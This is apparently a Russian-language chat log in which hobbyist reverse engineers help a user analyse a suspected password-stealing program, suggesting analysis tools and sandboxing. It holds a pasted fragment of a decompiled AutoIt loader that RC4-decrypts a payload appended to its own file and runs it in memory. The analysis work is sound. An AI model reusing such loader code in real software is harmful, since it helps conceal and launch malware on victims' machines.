Artem
если не ошибка, то спасибо
Artem
есть некий вредонос на 3 мб, написан на С++, по идее должен шариться по папкам и как-то искать пароли (и отсылать их автору на почту?)
автор скорее всего скрипткидди, так что зловред не должен быть запакован/зашифрован/обфусцирован
антивирусом винды 10 детектируется как PasswordFox
при запуске для пользователя ничего не происходит, но procmon показывает многочисленные операции с файлами в том числе readfile
я так понимаю procmon не умеет показывать над какими именно файлами происходят операции
с tcpview и wireshark не увидел чтоб зловред стучался в интернет, да и брандмауэр включенный не отреагировал
в IDA смотрел - туева хуча каких-то процедур, я в ассемблере, так еще и в x86 ассемблере полный ноль, так что ничего полезного мне это не дало
Artem
вот такие дела
помогите разобрать зловред
Artem
Artem
Artem
KosBeg
ну скинь зловред для начала =)
Artem
Artem
Artem
ща
Artem
KosBeg
в запароленом архиве
Artem
KosBeg
что-бы посмотреть какие файлы - можно юзать api monitor
http://www.rohitab.com/apimonitor
Artem
логфайл procmon, если поможет
Artem
Artem
Anonymous
что вытащить хочешь, или просто понять работу?
Artem
никогда этим не занимался, стало интересно
Artem
завтра только смогу
Artem
и может ли что-нибудь пойти не так если я использую 64 бит иду для 32 битного приложения
Artem
ну в смысле у ида две иконки - 32 и 64
Anonymous
нет
Anonymous
все будет ок
KosBeg
KosBeg
нет, это pestudio
KosBeg
и может ли что-нибудь пойти не так если я использую 64 бит иду для 32 битного приложения
по сути нет, всё должно быть ок, только не будет декомпиль работать так, напишет мол "для декомпиляции 32бит бинаря юзайте иду для 32бит бинарей(а не для 64бит)"
Anonymous
да наверняка через nss декодит
KosBeg
Anonymous
да жёсткая тема
KosBeg
KosBeg
вроде как не обфусцировано
Anonymous
да все импорты торчат
Anonymous
не обфусцировано
Artem
KosBeg
ну да
Artem
беглым взглядом не увидел ничего подозрительного
Artem
только в конце какая-то строка опкодов
Artem
но спасибо
Видел я подобного стилера. Написан на шарпе был, всё в открытую, воровал данные от Стима - юзердату и из реестра что-то выгружал, паковал всё в зипчик и выгружал на ftp. Самое смешное, что и адрес и пароль от админа(!!!) был чуть-ли не плэйнтекстом.
bilka00
беглым взглядом не увидел ничего подозрительного
FileDelete(@AppDataDir & "/Sdat.exe")
$readsettings = readeof(@AutoItExe)
$decrypt = _rc4($readsettings, "H)/(F49%7b")
$decryptsettings = BinaryToString($decrypt)
$split = StringSplit($decryptsettings, BinaryToString("0x7C602DB47C"), 1)
If BinaryToString(_rc4($split[2], $split[3])) <> 'K:|m4a`!Tq"JD+$6gre/qUANcgGgydYTyiqEc=tU' Then
MsgBox(16, "Error", BinaryToString(_rc4($split[2], $split[3])))
EndIf
runbin(_rc4($split[1], $split[3]))
bilka00
Без обид
bilka00
херовый у тебя взгляд
bilka00
даю 95% что что то вредоносное
bilka00
По крайней мере дальше
Artem
только почему месседжбоксы
Artem
у меня вредонос ничего не открыл
bilka00
видимо херовенький кодер писал
bilka00
Я бы советовал его в песочке пустить
bilka00
вроде гибриданализа
Artem
bilka00
любым декомпилятором
bilka00
их пару штук разных есть
Artem
я snowman'ом пытался
Artem
не особо осознанный код выходит
KosBeg
Google - > AutoIt decompiler -> http://domoticx.com/autoit3-decompiler-exe2aut/
bilka00
Я так же AutoIT реверсю )
Artem
спасибо еще раз
Обращайся
Artem
Artem
прибить его, чтоб не мучался?
Anonymous
лол, 99% цпу жрёт?
Anonymous
95
Минут через 5, если не успокоится.
JeisonWi
miner?
Anonymous
какой-нибудь цпу майнер мб
Anonymous
типо xmrig
Artem
да какой майнер
Artem
у меня те же бараны
Artem
пытаюсь через api monitor посмотреть какие файлы он смотрит